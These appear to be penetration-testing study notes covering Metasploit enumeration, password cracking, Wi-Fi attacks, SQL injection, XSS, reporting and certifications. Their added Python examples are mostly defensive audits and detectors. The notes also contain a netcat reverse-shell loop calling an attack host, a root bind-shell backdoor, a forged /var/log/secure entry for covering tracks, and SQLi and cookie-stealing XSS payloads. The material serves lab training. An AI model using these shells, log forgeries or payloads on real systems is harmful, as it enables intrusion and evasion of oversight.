- set RHOSTS 192.168.1.123
- run
- Once we have this information, we can attempt to find passwords for each user
- launch bogus e-mails as the root user (Social Engineering)
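The SMTP user enumeration that smtp_enum automates, shown with both sides of the exchange. This is an added example, not the outline's material and not Metasploit's code: the client sends VRFY for each candidate and keeps the names the server confirms, and the constructed SMTP server on 127.0.0.1 (hostname, users and greeting invented) can be switched between answering honestly and returning 252, which is how a hardened server blocks this.

```python
import socket
import threading

# Added example (not from the outline, not Metasploit's smtp_enum): VRFY-based
# user enumeration against a constructed SMTP server so the exchange runs
# offline. All names and hosts below are made up for the demo.


def _readline(f):
    return f.readline().decode("latin-1").rstrip("\r\n")


def smtp_enum(host, port, candidates, timeout=3.0):
    """Send VRFY <user> for every candidate and keep the confirmed ones.

    250/251 = user exists, 550 = no such user, 252 = the server refuses to
    verify (enumeration is blocked here; RCPT TO is the usual fallback).
    Returns (found, blocked)."""
    found, blocked = [], False
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rb")
        _readline(f)                                 # 220 greeting
        s.sendall(b"HELO scanner.local\r\n")
        _readline(f)                                 # 250
        for user in candidates:
            s.sendall(b"VRFY " + user.encode("ascii") + b"\r\n")
            code = _readline(f)[:3]
            if code == "252":
                blocked = True
                break
            if code in ("250", "251"):
                found.append(user)
        s.sendall(b"QUIT\r\n")
    return found, blocked


def fake_smtp(valid_users, verify_allowed=True):
    """Constructed target: one-connection SMTP server that answers VRFY
    honestly (the misconfiguration) or with 252 (the fix). Returns the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            f = conn.makefile("rb")
            conn.sendall(b"220 mail.example.test ESMTP (constructed)\r\n")
            while True:
                line = _readline(f)
                if not line:
                    break
                verb, _, arg = line.partition(" ")
                verb = verb.upper()
                if verb == "HELO":
                    conn.sendall(b"250 mail.example.test\r\n")
                elif verb == "VRFY" and not verify_allowed:
                    conn.sendall(b"252 Cannot VRFY user, but will try delivery\r\n")
                elif verb == "VRFY" and arg in valid_users:
                    conn.sendall(b"250 %s <%s@example.test>\r\n" % (arg.encode(), arg.encode()))
                elif verb == "VRFY":
                    conn.sendall(b"550 5.1.1 User unknown\r\n")
                elif verb == "QUIT":
                    conn.sendall(b"221 Bye\r\n")
                    break
                else:
                    conn.sendall(b"502 Command not implemented\r\n")
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    port = fake_smtp({"root", "msfadmin", "postfix"})
    print(smtp_enum("127.0.0.1", port, ["root", "nobody", "msfadmin", "admin"]))
```

On a real engagement every VRFY lands in the mail log, so the candidate list should come from the passive phase (harvested addresses, naming convention) rather than a whole wordlist.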
-
Server Message Block
- SMB user enumeration
- use auxiliary/scanner/smb/smb_enumshares
- Brute-force of “msfadmin” password.
- Creating link to remote file share.
- use auxiliary/admin/smb/samba_symlink_traversal
- show options
- set SMBSHARE tmp
- exploit
- Logging onto the remote system’s/root directory.
-
Network File Shares
- We can scan for Network File Shares (NFS)
- using the "nfsmount" module in Metasploit
- use auxiliary/scanner/nfs/nfsmount
- show options
- set RHOSTS
- run
-
MySQL
- auxiliary/scanner/mysql/mysql_login module
- grab the hashes stored in the MySQL
- use auxiliary/scanner/mysql/mysql_hashdump
- show options
- set RHOSTS
- run
-
PostgreSQL
- postgres_login module
- auxiliary/scanner/postgres/postgres_schemadump
- Metasploit also has modules for Oracle as well
-
VNC
- use auxiliary/scanner/vnc/vnc_none_auth
- show options
- set RHOSTS
- set USERNAME root
- run
- Never trust a tool and use more than one for each task
-
Exploit Code
-
Internet Sites
- the repository of exploits: www.exploit-db.com
- So, which exploits should we attempt? All of them!
-
Local System Attacks
-
System Exploitation
-
Internal Vulnerabilities
- only possible if local access is somehow obtained first
- an effective method of elevating privileges on a target system
-
Sensitive Data
- We may not always obtain administrative permissions
- gather sensitive information that shouldn’t be available to unauthorized users
- Ex: we successfully downloaded /etc/shadow
- Once we have access to a command prompt, we need to take a bit of time and really explore the server for useful data
-
Meterpreter
- Once we have Meterpreter running, we can explore the exploited system.
- It is possible to “jump” from the current user/process into one that is more elevated
-
Shells and Reverse Shells
-
Netcat Shell
- To use netcat as a backdoor we need to have a way to direct all
communication through netcat into a shell or command prompt
- Nmap scan against the Hackerdemia => nmap 192.168.1.123
- The port we will look at is port 1337
- When a connection is made, netcat will execute
the bash shell, allowing us to interact with the system
- A child process inherits the privileges of whoever launched it
- netcat was started by the system's own startup script (as root), so the bash shell
it spawns runs as root
-
nc 192.168.1.123 1337
- whoami => root
- pwd => /
- ifconfig => eth0 , lo ...
- uname -a => Linux slax 2.6.16
- We now have a backdoor that will be accessible as long as the startup script is running.
-
Netcat Reverse Shell
- A reverse shell connects outbound from the target, which most firewalls allow, so it gets through where an inbound connection to a bind shell would be blocked
-
Reverse shell using netcat (script run on the target; 192.168.1.10 is the attack system)
- #!/bin/sh
- while true; do
-     nc 192.168.1.10 1337 -e /bin/sh
-     sleep 5
- done
- the sleep keeps the loop from spinning while no listener is up
- requires a netcat built with -e support (nc.traditional); the OpenBSD netcat does not have it
- Listener on the attack system: nc -l -p 1337
- Because we are root on the attack system, it really doesn’t matter which port we use
- everything we send to the target system will be in cleartext =>
netcat does not encrypt the communication stream
- If we create a backdoor in a penetration test, we will need to be able to remove them later
-
Encrypted Tunnels
- An SSH tunnel lets us push tools and additional exploits onto the victim system inside an encrypted stream, so network monitoring sees only SSH traffic
- Addition of iptables rules to block any incoming traffic from the attack system
-
Adding a Host Firewall (Optional)
-
Setting Up the SSH Reverse Shell
- nc 192.168.1.100 22
- SSH-1.99-OpenSSH_4.3 (the server's banner: SSH-<protocol version>-<software version>)
- typing anything that is not a valid SSH version string (e.g. root) gets "Protocol mismatch" and the server disconnects
-
Setting Up Public/Private Keys
- first create a public/private RSA key pair with an empty
passphrase, which allows us to automate our connection (no prompt when the tunnel comes up)
- create a netcat listener that will push the id_rsa file to a connecting system
-
Setup on the attack server for the SSH connection
- generate the key pair: ssh-keygen -t rsa (press Enter at the passphrase prompt)
- append the id_rsa.pub file to the authorized_keys file on our attack server
- cat id_rsa.pub >> /root/.ssh/authorized_keys
- once the reverse tunnel is up, connect an SSH client to the local listening port: ssh -p 44444 localhost
- Launch the Encrypted Reverse Shell
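The key-based reverse shell works because a passphrase-less key is appended to an `authorized_keys` file with no restrictions, so the same file is where a defender looks. The following is an added example, not code from the notes or the book, that parses an `authorized_keys` file (options, key type, key blob, comment) and reports entries with no `from=`, `command=` or `restrict` option, plus legacy DSA keys. The sample file is constructed and its key blobs are placeholders.

```python
KEY_TYPES = ("ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-", "sk-ssh-ed25519", "sk-ecdsa-")
RESTRICTING = {"from", "command", "restrict"}


def _split_options(options):
    """Split an authorized_keys option string on commas that are outside double quotes."""
    out, cur, quoted = [], "", False
    for ch in options:
        if ch == '"':
            quoted = not quoted
        if ch == "," and not quoted:
            out.append(cur)
            cur = ""
        else:
            cur += ch
    if cur:
        out.append(cur)
    return out


def parse_line(line):
    """Return {'options', 'type', 'key', 'comment'} or None for blank and comment lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith(KEY_TYPES):
        options, rest = "", line
    else:
        # Options come first and contain no unquoted whitespace.
        i, quoted = 0, False
        while i < len(line) and (quoted or not line[i].isspace()):
            if line[i] == '"':
                quoted = not quoted
            i += 1
        options, rest = line[:i], line[i:].strip()
    parts = rest.split(None, 2)
    if len(parts) < 2:
        return None
    return {"options": _split_options(options), "type": parts[0], "key": parts[1],
            "comment": parts[2] if len(parts) == 3 else ""}


def audit_authorized_keys(text):
    """Return [(line_number, comment, [problems])] for entries that deserve a look."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        entry = parse_line(raw)
        if entry is None:
            continue
        names = {opt.split("=", 1)[0] for opt in entry["options"]}
        problems = []
        if not names & RESTRICTING:
            problems.append("no from=/command=/restrict option: full shell from any source address")
        if entry["type"] == "ssh-dss":
            problems.append("ssh-dss (DSA) key; disabled by default in current OpenSSH")
        if problems:
            findings.append((n, entry["comment"], problems))
    return findings


# Constructed authorized_keys content; the key blobs are placeholders, not real keys.
SAMPLE_AUTHORIZED_KEYS = """\
# backup job, restricted to the backup network and a single command
from="10.0.0.0/8",command="/usr/local/bin/backup" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDER backup@ops
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCPLACEHOLDER root@slax
ssh-dss AAAAB3NzaC1kc3MAAACBPLACEHOLDER legacy@host
"""

if __name__ == "__main__":
    for line_no, comment, problems in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS):
        print(line_no, comment, problems)
```

Run it against `/root/.ssh/authorized_keys` on the servers you manage; the `root@slax`-style entry with no options is exactly what a dropped `id_rsa.pub` looks like. Pair it with `PermitRootLogin` set to `no` or `prohibit-password` in `sshd_config` and a file-integrity watch on `authorized_keys`, so an appended key raises an alert instead of a silent tunnel.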
-
Other Encryption and Tunnel Methods
-
Cryptcat
- twofish encryption algorithm
- both systems must possess the same cipher key
- http://cryptcat.sourceforge.net
-
Matahari
- written in Python
- uses the ARC4 encryption algorithm
- ARC4 is now a deprecated method of encryption but is still useful in a penetration test environment
- http://matahari.sourceforge.net
-
Proxytunnel
- can create an OpenSSH tunnel to our attack system
- shell access to the victim server
- http://proxytunnel.sourceforge.net
-
Socat
- can encrypt the traffic using OpenSSL
- www.dest-unreach.org/socat/
-
Stunnel
- an SSL wrapper
- https://stunnel.org/
-
Privilege Escalation
-
Password Attacks
-
Remote Password Attacks
- Before we begin, we need to create and gather dictionaries
- Create additional dictionaries according to our current target
-
De-ICE 1.100
- we see a list of different e-mail addresses
- we can use these e-mails to build a list
- We may be able to avoid adding variations if we already know the pattern used within an organization to assign usernames to employees
- we have a partial list of potential login names.
- root
- adamsa
- banterb
- ...
- we conduct an Nmap scan against the target system
- Weak password for username “bbanter.” (Hydra)
- “bbanter” has very limited access to the system
- Nothing useful on the system
- attack against the “aadams”
- we will be using the “rockyou.txt” file available at SkullSecurity.org
- Successful dictionary attack
-
Local Password Attacks
- dependent on our ability to capture hashes from a compromised system
- Hashes from Metasploitable
- we launch JTR against the hash file using the rockyou.txt dictionary
- “msfadmin” username has a password of “msfadmin”
- Dictionary Attacks
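What Hydra and JTR do in these notes is try a wordlist (plus the username itself) against each account; a defender runs the same test on purpose, before an attacker does, and raises the cost per guess. The following is an added example, not code from the notes or from JTR, that audits constructed shadow-style records hashed with salted PBKDF2-HMAC-SHA256 against a tiny wordlist with the usual capitalisation and trailing-digit variations. The accounts, passwords, wordlist and iteration count are all constructed for the demo.

```python
import hashlib
import os

ITERATIONS = 10_000  # kept low so the demo is quick; production deployments use far more


def hash_password(password, salt, iterations=ITERATIONS):
    """Salted PBKDF2-HMAC-SHA256; the checker must use exactly the stored function."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def make_record(username, password):
    """Shadow-style record (constructed) for the demo."""
    salt = os.urandom(16)
    return {"user": username, "salt": salt, "hash": hash_password(password, salt)}


def candidate_variants(base):
    # The cheap 'variations' the notes mention: capitalised and/or a trailing digit.
    return (base, base.capitalize(), base + "1", base.capitalize() + "1")


def audit_passwords(records, wordlist):
    """Return {username: matched_candidate or None}.

    The username itself is tried first (the msfadmin/msfadmin case in the notes),
    then each wordlist entry with its variants. Stops at the first hit per account.
    """
    results = {}
    for rec in records:
        results[rec["user"]] = None
        for base in [rec["user"]] + list(wordlist):
            hit = next((c for c in candidate_variants(base)
                        if hash_password(c, rec["salt"]) == rec["hash"]), None)
            if hit is not None:
                results[rec["user"]] = hit
                break
    return results


SAMPLE_WORDLIST = ["password", "123456", "letmein", "qwerty", "welcome"]  # constructed mini wordlist
SAMPLE_RECORDS = [  # constructed accounts: two deliberately weak, one not derivable from any list
    make_record("msfadmin", "msfadmin"),
    make_record("aadams", "Password1"),
    make_record("bbanter", "Tr0ub4dor&3-correct-horse"),
]

if __name__ == "__main__":
    print(audit_passwords(SAMPLE_RECORDS, SAMPLE_WORDLIST))
```

Two knobs fall out of the code: the iteration count (a slow KDF multiplies the attacker's cost per guess by the same factor it multiplies yours, and yours is one hash per login) and the wordlist check, which belongs at password-set time as a blocklist rather than only in a later audit. The same `rockyou.txt` the notes use for attacking is the obvious blocklist to start with.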
-
Network Packet Sniffing
- MITM attack using Ettercap
- The MITM attack is totally independent from the sniffing
- The aim of the attack is to hijack packets and redirect them to ettercap
- You can choose the MITM attack that you prefer and also combine some of them to perform different attacks at the same time
-
methods in which network data can be captured
- Domain name system (DNS)—Cache poisoning
- DNS forgery
- User interface (UI) redressing
- Border Gateway Protocol (BGP) hijacking
- Port Stealing
- Dynamic Host Configuration Protocol (DHCP) spoofing
- Internet Control Message Protocol (ICMP) redirection
- MITM
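The Ettercap MITM described above works by sending forged ARP replies so that the victim and the gateway both map the other's IP address to the attacker's MAC. That leaves a detectable trace on the wire: an IP address whose MAC changes, and one MAC that suddenly claims the gateway as well as another host. The following is an added example, not code from the notes or from Ettercap, that reads `tcpdump -n arp`-style lines and raises those two alerts. The capture lines and the gateway address are constructed.

```python
import re
from collections import defaultdict

# "12:00:05.000000 ARP, Reply 192.0.2.1 is-at 00:11:22:33:44:14, length 28"
ARP_REPLY = re.compile(r"^(\S+)\s+ARP, Reply (\S+) is-at ([0-9a-fA-F:]{17})")


def parse_tcpdump_arp(line):
    """Parse one 'tcpdump -n arp' reply line into (timestamp, ip, mac); None for other lines."""
    m = ARP_REPLY.match(line)
    if not m:
        return None
    return m.group(1), m.group(2), m.group(3).lower()


def detect_arp_spoofing(lines, gateway_ip):
    """Return [(timestamp, message)] for IP-to-MAC changes and gateway impersonation."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    flagged_macs = set()
    alerts = []
    for line in lines:
        parsed = parse_tcpdump_arp(line)
        if parsed is None:
            continue
        ts, ip, mac = parsed
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            alerts.append((ts, f"{ip} moved from {prev} to {mac}"))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        others = mac_to_ips[mac] - {gateway_ip}
        if gateway_ip in mac_to_ips[mac] and others and mac not in flagged_macs:
            flagged_macs.add(mac)
            alerts.append((ts, f"{mac} claims the gateway {gateway_ip} and {sorted(others)}"))
    return alerts


# Constructed capture: legitimate replies first, then an attacker host taking over both
# the gateway and a workstation, which is the two-sided MITM the notes describe.
SAMPLE_CAPTURE = [
    "12:00:01.000000 ARP, Reply 192.0.2.1 is-at 00:11:22:33:44:01, length 28",
    "12:00:01.500000 ARP, Reply 192.0.2.10 is-at 00:11:22:33:44:0a, length 28",
    "12:00:02.000000 ARP, Request who-has 192.0.2.20 tell 192.0.2.1, length 28",
    "12:00:02.100000 ARP, Reply 192.0.2.20 is-at 00:11:22:33:44:14, length 28",
    "12:00:05.000000 ARP, Reply 192.0.2.1 is-at 00:11:22:33:44:14, length 28",
    "12:00:05.100000 ARP, Reply 192.0.2.10 is-at 00:11:22:33:44:14, length 28",
]

if __name__ == "__main__":
    for ts, msg in detect_arp_spoofing(SAMPLE_CAPTURE, gateway_ip="192.0.2.1"):
        print(ts, msg)
```

A router that legitimately answers for several addresses will trip the second rule, so seed `mac_to_ips` from a known-good baseline before alerting on it. The structural fix is not detection but prevention: dynamic ARP inspection on the switch, or static ARP entries for the gateway on sensitive hosts, which are the controls that make the MITM in these notes fail rather than merely show up in a log.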
-
Social Engineering
-
attacks
- Shoulder surfing
- Physical access to workstations
- Masquerading as a user
- Masquerading as a monitoring staff
- Dumpster diving
- Handling (finding) sensitive information
- Reverse social engineering
-
Baiting
- uses computer media to entice a victim into installing malware
- Ex: leave a CD-ROM disk in a public place
- Rely on natural human curiosity when presented with an unknown
-
Phishing
- fake e-mails, which request a user to connect to an illegitimate site
- Some phishing attacks target victims through the phone
-
Pretexting
- inventing a scenario to convince victims to divulge information they should not divulge
-
Manipulating Log Data
-
User Login
-
Modifying the log file and matching time stamps.
- root@slax:~# more /var/log/secure
- root@slax:~# date
- Wed Apr 29 11:26:30 GMT 2009
- root@slax:~# echo 'Apr 29 11:28:08 (none) su[31337]: + vc/1 root-root' >> /var/log/secure
- root@slax:~# date
- Wed Apr 29 11:28:08 GMT 2009
-
Application Logs
- Take a look at the /var/log/messages file
-
Hiding Files
-
Hiding Files in Plain Sight
- we need to camouflage our script
- change the name of the file
- Hiding Files Using the File System
-
Hiding Files in Windows
- By adding the hidden attribute to virus.exe
- any application launched in Microsoft Windows can be detected by looking at the processes running on the system
-
Two options
- Delete the entire log
- Modify the content
-
Two types of logs
- System generated
- Application generated
-
Targeting Support Systems
-
Database Attacks
- first step : Nmap scan, using the “-A” flag
- take a look at the available exploits and modules available on Metasploit
- First thing to check: weak passwords
- We can use our own dictionaries to conduct a brute-force attack
- Network Shares
-
Targeting The Network
-
Wireless Network Protocols
-
Wi-Fi Protected Access Attack
- Set in monitor mode
-
airodump-ng
- Basic Service Set Identifier (BSSID)
- Extended Service Set Identifier
- Station (client) MAC addresses:
-
aireplay-ng
- deauthenticate connected clients from a target access point, requiring the clients to reconnect and reauthenticate using the WPA handshake
- Dictionary attack against the encrypted key
-
aircrack-ng
- Decipher our captured WPA encrypted key
-
WEP Attack
-
Cracking WEP involves capturing all IVs between the client and the AP
- IVs are blocks of bits that are used to differentiate users on the wireless network
- IVs eliminate the need for users to constantly reauthenticate
- Eventually, an authenticated user will reuse an IV because the number of bits used is limited
- If enough IVs are captured, it is possible to decipher
- WEP encryption can be broken regardless of the encryption key complexity
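The notes say an IV is eventually reused because the number of bits is limited; WEP's IV is 24 bits, so it helps to put a number on "eventually". The following is an added example, not from the notes, that computes the birthday-bound probability of a repeated IV after a given number of frames when IVs are chosen at random, and the frame count at which that probability reaches a target. It is the general calculation for any IV width; WEP is the 24-bit instance.

```python
import math

WEP_IV_BITS = 24  # WEP's per-frame IV width


def iv_reuse_probability(frames, iv_bits=WEP_IV_BITS):
    """Probability that at least two of `frames` uniformly random IVs are equal."""
    space = 2 ** iv_bits
    if frames > space:
        return 1.0  # pigeonhole: more frames than IV values
    # log P(no collision) = sum_{i=0}^{frames-1} log(1 - i/space); summed in log form
    # to avoid underflow for large frame counts.
    log_no_collision = 0.0
    for i in range(frames):
        log_no_collision += math.log1p(-i / space)
    return 1.0 - math.exp(log_no_collision)


def frames_for_reuse_probability(target, iv_bits=WEP_IV_BITS):
    """Smallest frame count at which the random-IV reuse probability reaches `target`."""
    space = 2 ** iv_bits
    log_no_collision, n = 0.0, 0
    while 1.0 - math.exp(log_no_collision) < target:
        log_no_collision += math.log1p(-n / space)
        n += 1
    return n


def sequential_reuse_frames(iv_bits=WEP_IV_BITS):
    """Frames until a counter-based IV wraps and starts repeating (it also restarts on reboot)."""
    return 2 ** iv_bits


if __name__ == "__main__":
    print("random IVs, 50% reuse after", frames_for_reuse_probability(0.5), "frames")
    print("sequential IVs wrap after", sequential_reuse_frames(), "frames")
```

With random IVs the 50% point arrives after roughly 4.8 thousand frames, a few seconds of traffic on a busy network; with a sequential counter the space is exhausted after 16.8 million frames, and many cards restarted the counter at zero on every reset. Either way the keystream repeats, which is the property the dictionary-free attack on WEP relies on and the reason the notes can say key complexity does not matter. The defence is not a longer key but a protocol whose per-frame nonce cannot repeat under the same key, which is what WPA2 and WPA3 provide.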
-
Simple Network Management Protocol
- UDP scan
- Brute-force attack of SNMP community strings.
- “snmpenum.pl” script to dump data from the target system
- Modifying hostname using “snmpset.”
-
Web Apps Attack Techniques
-
SQL Injection
- technique used for manipulating Web services that send SQL queries to an RDBMS to alter, insert, or delete data in a database
- SQL injections work more often than they should
-
SELECT * FROM user_data WHERE last_name = 'Tom' OR '1' = '1'
- display the user_data associated with the user TOM
- give us everything because 1 = 1
- SQL injections are perfect examples of weaknesses in Integrity Controls
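The query above is what the application ends up sending when the last name it received was `Tom' OR '1' = '1` and it built the statement by string concatenation. The following is an added example, not code from the notes, that reproduces that against an in-memory SQLite table and sets the parameterised version beside it, so the same input returns every row from one function and nothing from the other. The table, its rows and the column names beyond `last_name` are constructed.

```python
import sqlite3


def make_db():
    """In-memory user_data table with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user_data (user_id INTEGER, first_name TEXT, last_name TEXT, cc_number TEXT)")
    db.executemany("INSERT INTO user_data VALUES (?, ?, ?, ?)", [
        (101, "Tom", "Tom", "4111-0000-0000-0001"),
        (102, "Jerry", "Mouse", "4111-0000-0000-0002"),
        (103, "Joe", "Snow", "4111-0000-0000-0003"),
    ])
    return db


def build_vulnerable_sql(last_name):
    # String concatenation: whatever the user typed is parsed as part of the SQL grammar.
    return "SELECT * FROM user_data WHERE last_name = '" + last_name + "'"


def vulnerable_lookup(db, last_name):
    return db.execute(build_vulnerable_sql(last_name)).fetchall()


def safe_lookup(db, last_name):
    # Parameter binding: the driver passes the value separately from the statement,
    # so a quote or an OR inside it is only ever compared against last_name.
    return db.execute("SELECT * FROM user_data WHERE last_name = ?", (last_name,)).fetchall()


# The input from the notes: closes the quote around Tom and appends an always-true clause.
PAYLOAD = "Tom' OR '1' = '1"

if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_sql(PAYLOAD))
    print("vulnerable:", len(vulnerable_lookup(db, PAYLOAD)), "rows")
    print("safe:      ", len(safe_lookup(db, PAYLOAD)), "rows")
```

The integrity point the notes make is visible in the row counts: the vulnerable function lets the caller change which rows a fixed query touches, and the same concatenation in an `UPDATE` or `DELETE` would let them change which rows are written. Parameterised statements (or a query builder that uses them underneath) remove the whole class; input filtering on quotes is a weaker second layer, not a substitute.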
-
Cross-Site Scripting
- Gather session information of a victim user, Ex: administrator
- It is sometimes possible to conduct a replay attack using the session information
- Injecting “Alert” script into database
- Once saved, an alert window will appear with the session ID information
- After we have successfully injected our script we wait until someone else visits Tom’s information
- use JavaScript or another programming language that embeds into HTML to send the session ID
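The stored XSS above succeeds for two independent reasons: the saved text is written back into the page as markup, and the session ID is readable from script. The following is an added example, not code from the notes, showing a profile renderer that interpolates stored data raw beside one that HTML-escapes it on output, and a session cookie header with the `HttpOnly` flag that keeps `document.cookie` from exposing the session ID even when a script does run. The profile record and cookie value are constructed; the `alert` payload is the standard XSS test string.

```python
import html


def render_profile_unsafe(profile):
    # Stored values are dropped straight into the page, so stored markup executes.
    return "<p>Name: " + profile["name"] + "</p><p>Bio: " + profile["bio"] + "</p>"


def render_profile_safe(profile):
    # Every untrusted value is escaped at output time: < > & " ' become entities,
    # so the browser shows the text of the payload instead of running it.
    return ("<p>Name: " + html.escape(profile["name"]) + "</p>"
            "<p>Bio: " + html.escape(profile["bio"]) + "</p>")


def session_cookie_header(session_id, secure=True):
    # HttpOnly: not readable from script. SameSite=Lax: not sent on cross-site POSTs.
    # Secure: only over HTTPS (left off only for a plain-HTTP lab).
    flags = ["HttpOnly", "SameSite=Lax", "Path=/"]
    if secure:
        flags.append("Secure")
    return "Set-Cookie: session=" + session_id + "; " + "; ".join(flags)


def contains_script_tag(markup):
    """Crude check used only to show the difference between the two renderers."""
    return "<script" in markup.lower()


# Constructed stored record: the bio field holds the 'Alert' script from the notes.
STORED_PAYLOAD = "<script>alert(document.cookie)</script>"
SAMPLE_PROFILE = {"name": "Tom", "bio": STORED_PAYLOAD}

if __name__ == "__main__":
    print(render_profile_unsafe(SAMPLE_PROFILE))
    print(render_profile_safe(SAMPLE_PROFILE))
    print(session_cookie_header("c0ffee-demo-session-id"))
```

Escaping belongs at output, in the template layer, because the same stored string may be rendered into HTML, an attribute, or JSON and each needs its own encoding; `html.escape` covers the element-body case shown here. The cookie flag does not stop the script from running, only from reading the session ID, which is why both controls are needed.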
-
Web Application Vulnerabilities
-
How
- Identify applications running on ports, usually port 80 or 443 for Web apps
- Find version information (if possible)
- Look for exploits on the Internet.
- Run the exploits against the target application
-
Top 10 attack vectors
- Injection (including SQL injections)
- Broken Authentication and Session Management
- Insecure Direct Object References
- Security Misconfiguration
- Sensitive Data Exposure
- Missing Function Level Access Control
- Cross-Site Request Forgery (an attack that targets a victim’s browser)
- Using Known Vulnerable Components
- Unvalidated Redirects and Forwards
-
Automated Tools
- CORE IMPACT
- HP WebInspect
- Nikto
- Paros Proxy
-
Burp Suite Pro
- A proxy server
- A spider tool
- A vulnerability scanner
- A repeater tool
- A sequencing tool
-
Reporting Results
-
What Should You Report?
-
Out of Scope Issues
- Findings that are discovered during the course of the pentest on a target
- Findings that indicate systemic flaws in the overall architecture
-
Findings
- We need to include what was not found as well
- There will be times when a finding needs to be reported on immediately.
-
Solutions
- Believe it or not, clients like to be told what to do.
-
Manuscript Preparation
-
Title Page
- Introduce the topic of the report
- Introduce author and the penetration test team’s organization
- Great place to brandish logos and make everything look appealing
- Primary goal: Provide a clear message of what the report is about
-
Abstract
- The abstract = The executive report
- The executive summary should be no longer than one page and contain concise analysis and findings
-
Text
- elements
- Description of the target network or system
- Vulnerability findings
- Remediation
- we should include graphical representation of the architecture and include descriptions of each element
- Vulnerability findings and remediation options should be meshed together
-
References
- we should provide the reader Internet references regarding the vulnerabilities
- The National Vulnerability Database, located at http://nvd.nist.gov, is a good choice
-
Appendices
- At least two appendices
- a list of definitions
- The step-by-step events surrounding each vulnerability exploitation
-
Initial Report
-
Peer Reviews
- We all make mistakes, especially when writing.
-
Fact Checking
- We can generate a list of questions that we need to answer, or we can send a copy of the initial report to the client so that they can verify all statements within the document
-
Metrics
- Nessus
- CORE IMPACT
-
Final Report
-
Peer Reviews
- it is often prudent to conduct additional peer reviews on the report
- This is our last chance to correct any grammatical errors
-
Documentation
- Most customers are comfortable with receiving printed reports
- Microsoft Word documents, or Adobe’s Portable Document Format (PDF)
- If we already have a digital certificate, we can use it to sign our document
- Selecting file for inclusion into security envelope.
-
Hacking as a career
-
Career Paths
-
Network Architecture
- make sure that you understand as many different facets of network architecture as you can if you want to become a pentest engineer
-
Learn about
- Communication protocols
- VoIP
- routers
- switches
- IDS
- firewall
- wireless
- Transmission Control Protocol (TCP)
- and anything else you can think of
- System Administration
- Applications and Databases
-
Certifications
-
High-Level Certifications
-
(ISC)2
- www.isc2.org
- About (ISC)2
- Headquartered in the United States
- offices in
- London
- Hong Kong
- Tokyo
- compendium
- Associate of (ISC)2
- This designation was created for individuals who do not meet the experience requirements to obtain any of the other certifications with (ISC)2
- employer that the associates have the knowledge to obtain the certifications, even if they don’t have the experience
- SSCP [(ISC)2]
- Access Controls
- Analysis and Monitoring
- Cryptography
- Malicious Code
- Networks and Telecommunications
- Risk, Response, and Recovery
- Security Operations and Administration
- Certification and Accreditation Professional (CAP)
- Understanding the Purpose of Certification
- Initiation of the System Authorization Process
- Certification Phase
- Accreditation Phase
- Continuous Monitoring Phase
- Certified Secure Software Lifecycle Professional (CSSLP) [(ISC)2]
- Secure Software Concepts
- Secure Software Requirements
- Secure Software Design
- Secure Software Implementation/Coding
- Secure Software Testing
- Software Acceptance
- Software Deployment, Operations, Maintenance, and Disposal
- CISSP [(ISC)2]
- Access Control
- Application Security
- Business Continuity Planning (BCP) and Disaster Recovery Planning (DRP)
- Cryptography
- Information Security and Risk Management
- Legal, Regulations, Compliance, and Investigations
- Operations Security
- Physical (Environmental) Security
- Security Architecture and Design
- Telecommunications and Network Security
- CISSP-ISSAP [(ISC)2]
- Access Control Systems and Methodology
- Cryptography
- Physical Security Integration
- Requirements Analysis and Security Standards, Guidelines and Criteria
- Technology-Related BCP and DRP
- Telecommunications and Network Security
- CISSP-ISSEP [(ISC)2]
- C&A
- Systems Security Engineering
- Technical Management
- U.S. Government Information Assurance Regulations
- CISSP-ISSMP [(ISC)2]
- BCP and DRP and Continuity of Operations Planning
- Enterprise Security Management Practices
- Enterprise-wide System Development Security
- Law, Investigations, Forensics, and Ethics
- Overseeing Compliance of Operations Security
- Information Systems Audit and Control Association
- Certified Information Systems Auditor
- Certified Information Security Manager
-
Global Information Assurance Certification
- GIAC Security Leadership Certification
- GIAC Security Expert
-
CompTIA
- Security +
- Network security
- Compliance and operational security
- Threats and vulnerabilities
- Application, data, and host security
- Access control and identity management
- Cryptography
-
Project Management Institute
- Project Management Professional (PMP)
- Initiation
- Planning
- Executing
- Monitoring and Controlling
- Closing
- Dynamic Systems Development Method Consortium
-
Skill- and Vendor-Specific Certifications
-
Cisco
- Cisco Certified Network Associate Security
- Cisco Certified Network Professional Security
- Cisco Certified Internetwork Expert
-
Global Information Assurance Certification
- GIAC Information Security Fundamentals
- GIAC Security Essentials Certification
- GIAC Web Application Penetration Tester (GWAPT)
- GIAC Certified Enterprise Defender (GCED)
- GIAC Certified Firewall Analyst (GCFW)
- GIAC Certified Intrusion Analyst (GCIA)
- GIAC Certified Incident Handler (GCIH)
- GIAC Certified Windows Security Administrator (GCWN)
- GIAC Certified UNIX Security Administrator (GCUX)
- GIAC Certified Forensics Analyst (GCFA)
- GIAC Certified Penetration Tester (GPEN)
-
Check Point
- Check Point Certified Security Administrator
- Check Point Certified Security Expert
- Check Point Certified Managed Security Expert
- Check Point Certified Master Architect (CCMA)
-
Juniper Networks
- JNCIA-Junos (Juniper Networks)
- Juniper systems certifications JNCIS-SEC
- JNCIE-SEC
- Oracle
-
Associations and Organizations
-
Professional Organizations
- American Society for Industrial Security
- Institute of Electrical and Electronics Engineers
- ISACA
- Information Systems Security Association
- The Open Organisation of Lockpickers
-
Conferences
- DoD Cyber Crime Conference
- Network and Distributed System Security
- ShmooCon
- GOVSEC and U.S. Law Conference
- Theory of Cryptography Conference (TCC)
- IEEE Symposium on Security and Privacy
- The International Conference on Dependable Systems and Networks (DSN)
